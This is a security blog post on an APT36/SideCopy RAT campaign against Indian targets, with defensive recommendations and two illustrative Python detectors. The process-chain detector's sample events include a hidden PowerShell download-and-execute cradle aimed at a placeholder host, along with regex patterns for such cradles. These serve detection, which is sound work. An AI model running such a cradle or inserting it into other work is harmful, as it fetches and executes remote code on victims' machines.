**APT36 SideCopy Target India with Cross Platform RAT Campaigns**

**Introduction**

Picture this: your organization’s data—sensitive IP, confidential comms, employee credentials—slowly exfiltrated without your team knowing. That’s exactly what’s happening right now in India, where the threat actor APT36, using the SideCopy malware toolkit, has launched a coordinated campaign involving cross-platform Remote Access Trojans (RATs). According to a recent report by The Hacker News (https://thehackernews.com/2026/02/apt36-and-sidecopy-launch-cross.html), this wave of cyberattacks is not only sophisticated but also precisely targeted against Indian defense, government, and strategic sectors.

As a CISO, CEO, or security leader, this isn’t just another alert—it’s a flashing red warning light. APT36 (also known as Transparent Tribe), a suspected Pakistan-based group, has evolved its tactics to deploy Windows and Android malware in the same campaign, enabling deep infiltration across endpoints and user environments.

In this post, we’ll break down what makes this campaign particularly concerning, how it’s structured, and—crucially—what steps you can take to guard your enterprise. You’ll learn:

– How APT36 is blending social engineering and RATs across platforms
– Why the SideCopy framework makes detection harder
– Specific actions you can take today to reduce exposure

Let’s dive in.

**A Blended Threat: Cross-Platform RATs with Precision Targeting**

APT36’s latest offensive isn’t just another phishing campaign laced with malware. The group is employing a multi-pronged strategy that uses customized lures, fileless execution, and Android-based surveillance tools. According to Cyble Research & Intelligence Labs, attackers are deploying a new wave of Remote Access Trojans—primarily Menorah RAT and LimePad—to compromise both Windows and Android endpoints.

What makes these attacks dangerous?

– **Cross-platform reach**: Once the Windows RAT infects a device, it establishes persistence, monitors activity, and enables exfiltration. Meanwhile, the Android variant (distributed as fake government or utility apps) can capture audio, SMS, and contacts—offering a complete view into the victim’s professional and private life.
– **Sophisticated social engineering**: APT36 uses malicious document files disguised as defense-related content (e.g., training reports, military operations files), which builds user trust and increases chances of successful infection.
– **Fileless techniques**: They avoid writing malicious files directly to disk, making detection by traditional antivirus tools considerably more difficult.

These modern APT campaigns don’t need a sophisticated chain of exploits—they rely on exploiting trust and user behavior. The result: a persistent presence within your network that’s hard to detect and potentially catastrophic if left unchecked.

**Why SideCopy Makes Detection So Complicated**

APT36 leverages the SideCopy malware delivery framework, named for its imitation of SideWinder APT tactics. SideCopy is particularly troubling for defenders because it combines familiar tactics with custom modules that are constantly updated to bypass detection.

Here’s why SideCopy elevates this campaign:

– **Layered malware loading**: SideCopy uses staged payloads—initial loaders bring in secondary components based on system context. This modular architecture means even if one part is flagged, the rest can remain dormant or operate unnoticed.
– **Command-and-control (C2) flexibility**: The campaign employs dynamic DNS and multiple layers of fallback infrastructure, making takedown and attribution more difficult.
– **Continual evolution**: Researchers have noted frequent tweaks to payload structures and obfuscation methods. Just as defenders catch up, new variants appear.

One particularly sneaky example in the current campaign involved a benign-looking Excel file that triggered a PowerShell stager executing the Menorah RAT in memory, so no RAT binary ever touched disk. The infected system could then be continuously monitored and updated through directives from the C2 server. In nearly all observed cases, the RAT gave attackers the ability to record keystrokes, capture screens, browse files, and conduct surveillance undetected.
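The Excel-to-PowerShell chain above is exactly the kind of parent/child relationship an EDR or SIEM rule can catch even when the payload never touches disk. The following is an added illustration, not code from the original post or from any vendor: it scans constructed Sysmon-style process-creation events (JSON lines; the hosts, timestamps and command lines are made up, and the URL uses the reserved `.invalid` domain) and flags any Office application spawning a script host, rating the finding higher when the command line shows typical in-memory stager traits.

```python
import json
import re

# Constructed sample events in a simplified Sysmon-style (Event ID 1) JSON-lines
# form; not real telemetry from the campaign. Backslashes are doubled for JSON.
SAMPLE_EVENTS = r"""
{"ts": "2026-02-10T09:14:02Z", "host": "WS-014", "parent": "C:\\Program Files\\Microsoft Office\\root\\Office16\\EXCEL.EXE", "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "cmdline": "powershell.exe -nop -w hidden -enc QUFBQUFB"}
{"ts": "2026-02-10T09:20:31Z", "host": "WS-014", "parent": "C:\\Windows\\explorer.exe", "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "cmdline": "powershell.exe -File C:\\Scripts\\inventory.ps1"}
{"ts": "2026-02-10T09:22:05Z", "host": "WS-021", "parent": "C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE", "image": "C:\\Windows\\System32\\cmd.exe", "cmdline": "cmd.exe /c powershell -w hidden IEX (New-Object Net.WebClient).DownloadString('http://placeholder.invalid/s')"}
"""

# Office applications whose child processes deserve scrutiny.
OFFICE_PARENTS = {"excel.exe", "winword.exe", "powerpnt.exe", "outlook.exe"}
# Script hosts and LOLBins a document has no business launching.
SCRIPT_CHILDREN = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe",
                   "cscript.exe", "mshta.exe", "rundll32.exe", "regsvr32.exe"}
# Command-line traits typical of an in-memory PowerShell stager.
INDICATORS = {
    "encoded_command": re.compile(r"-e(nc(odedcommand)?)?\s+\S", re.I),
    "hidden_window": re.compile(r"-w(indowstyle)?\s+hidden", re.I),
    "no_profile": re.compile(r"-nop(rofile)?\b", re.I),
    "download_cradle": re.compile(
        r"downloadstring|invoke-webrequest|net\.webclient|\biex\b", re.I),
}

def basename(path):
    """Lower-cased file name from a Windows or POSIX path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()

def analyze(events_text):
    """Return a finding for every Office -> script-host process chain,
    rated 'high' when stager traits appear on the command line."""
    findings = []
    for line in events_text.splitlines():
        if not line.strip():
            continue
        ev = json.loads(line)
        parent, child = basename(ev["parent"]), basename(ev["image"])
        if parent not in OFFICE_PARENTS or child not in SCRIPT_CHILDREN:
            continue
        hits = [n for n, rx in INDICATORS.items() if rx.search(ev["cmdline"])]
        findings.append({"ts": ev["ts"], "host": ev["host"], "parent": parent,
                         "child": child, "indicators": hits,
                         "severity": "high" if hits else "medium"})
    return findings

if __name__ == "__main__":
    for f in analyze(SAMPLE_EVENTS):
        print(f"[{f['severity']}] {f['host']} {f['parent']} -> {f['child']} {f['indicators']}")
```

The explorer.exe-launched script in the sample is deliberately left alone: the rule keys on the Office parent, which is what distinguishes a document lure from routine administration.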

**How to Defend Against SideCopy RAT Campaigns**

Understanding the threat is only half the battle. The real win lies in proactively defending your infrastructure, devices, and people. Here’s how you can get ahead:

1. **Strengthen email and collaboration defenses**
– Implement attachment and link-scanning with sandboxing.
– Use DMARC, DKIM, and SPF protocols to prevent email spoofing.
– Ban macro-enabled Office files from unverified sources in email gateways.

2. **Educate users regularly**
– Launch phishing simulation exercises.
– Teach staff to recognize lures imitating official government or internal communications.
– Encourage immediate reporting of suspicious content—don’t punish mistakes, reward alerts.

3. **Enhance endpoint detection and response (EDR)**
– Deploy EDR solutions that can monitor process behavior and lateral movement.
– Set baseline activity norms to quickly identify anomalies from dormant agents.
– Cross-reference alerts with threat intelligence feeds, such as emerging SideCopy IOCs.

4. **Secure mobile devices**
– Ban installation of apps from unofficial stores—especially critical in BYOD environments.
– Enforce Mobile Device Management (MDM) with app whitelisting and secure VPN use.
– Monitor usage of file-sharing, SMS, and permissions on Android devices.

5. **Leverage threat intel collaboration**
– Join ISACs (Information Sharing and Analysis Centers) relevant to your sector.
– Share observables like C2 domains and file hashes with peer organizations.
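Item 1 above recommends banning macro-enabled Office files from unverified sources at the email gateway. As an added example that is not part of the original post or any gateway product, the function below shows what that policy check looks like when it goes beyond the file extension: it also opens OOXML attachments to look for an embedded VBA project (so a macro document renamed to `.xlsx` is still caught) and routes legacy OLE2 binaries (`.xls`/`.doc`), which need a dedicated parser to inspect, to a separate inspection queue. The sample workbooks are constructed in memory and contain no real macro code.

```python
import io
import zipfile

# Extensions Office treats as macro-enabled; blocked outright from unverified senders.
MACRO_EXTENSIONS = {".xlsm", ".xltm", ".xlam", ".docm", ".dotm", ".pptm", ".potm", ".ppam"}
# Magic bytes of the legacy OLE2 container (.xls/.doc). Macros inside it need a
# dedicated parser, so such files are routed to manual or sandbox inspection.
OLE2_MAGIC = b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1"

def classify_attachment(filename, data):
    """Return 'block', 'inspect' or 'allow' for one attachment.
    Checks the extension first, then looks inside OOXML zips for a VBA
    project so that a macro document renamed to .xlsx is still caught."""
    ext = "." + filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    if ext in MACRO_EXTENSIONS:
        return "block"
    if data.startswith(OLE2_MAGIC):
        return "inspect"
    buf = io.BytesIO(data)
    if zipfile.is_zipfile(buf):
        with zipfile.ZipFile(buf) as zf:
            if any(name.lower().endswith("vbaproject.bin") for name in zf.namelist()):
                return "block"
    return "allow"

def make_sample_ooxml(with_macro):
    """Build a minimal constructed OOXML workbook in memory (not a real lure)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("[Content_Types].xml", "<Types/>")
        zf.writestr("xl/workbook.xml", "<workbook/>")
        if with_macro:
            zf.writestr("xl/vbaProject.bin", b"\x00" * 16)  # stand-in for a VBA project
    return buf.getvalue()

if __name__ == "__main__":
    samples = [("report.xlsm", make_sample_ooxml(False)),
               ("report.xlsx", make_sample_ooxml(True)),
               ("report.xlsx", make_sample_ooxml(False)),
               ("legacy.xls", OLE2_MAGIC + b"\x00" * 8)]
    for name, blob in samples:
        print(name, "->", classify_attachment(name, blob))
```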

**According to a 2025 Cisco Cybersecurity Readiness Index, 58% of organizations in the Asia-Pacific region reported at least one targeted malware attack involving social engineering last year.** Given the precision of APT36’s tactics, Indian enterprises need to prepare now—not after a breach occurs.

**Conclusion**

APT36’s latest campaign targeting India isn’t just a wake-up call—it’s the alarm clock we can’t hit snooze on. The blending of familiar malware frameworks like SideCopy with cross-platform functionality marks a dangerous evolution in targeted attack strategy. With devices becoming more interconnected, and attackers increasingly adept at subtle footprints, it’s no longer about if they’ll strike, but when—and how well you’re prepared.

We’ve seen how APT36 uses tailored lures, hides behind fileless execution, and targets Windows and Android systems simultaneously. But we’re not powerless. By strengthening awareness, improving detection capabilities, and adopting a zero-trust mindset, we can box out these threats before they take root.

**Now is the time to evaluate your current exposure. Are your users trained? Are your endpoints monitored with behavior-based tools? Is your mobile risk surface accounted for?** If any answer is “not sure,” now’s the time to act.

For deeper insight into the threat campaign, visit the full report at The Hacker News: https://thehackernews.com/2026/02/apt36-and-sidecopy-launch-cross.html

Let’s stay vigilant—together.

Categories: Information Security
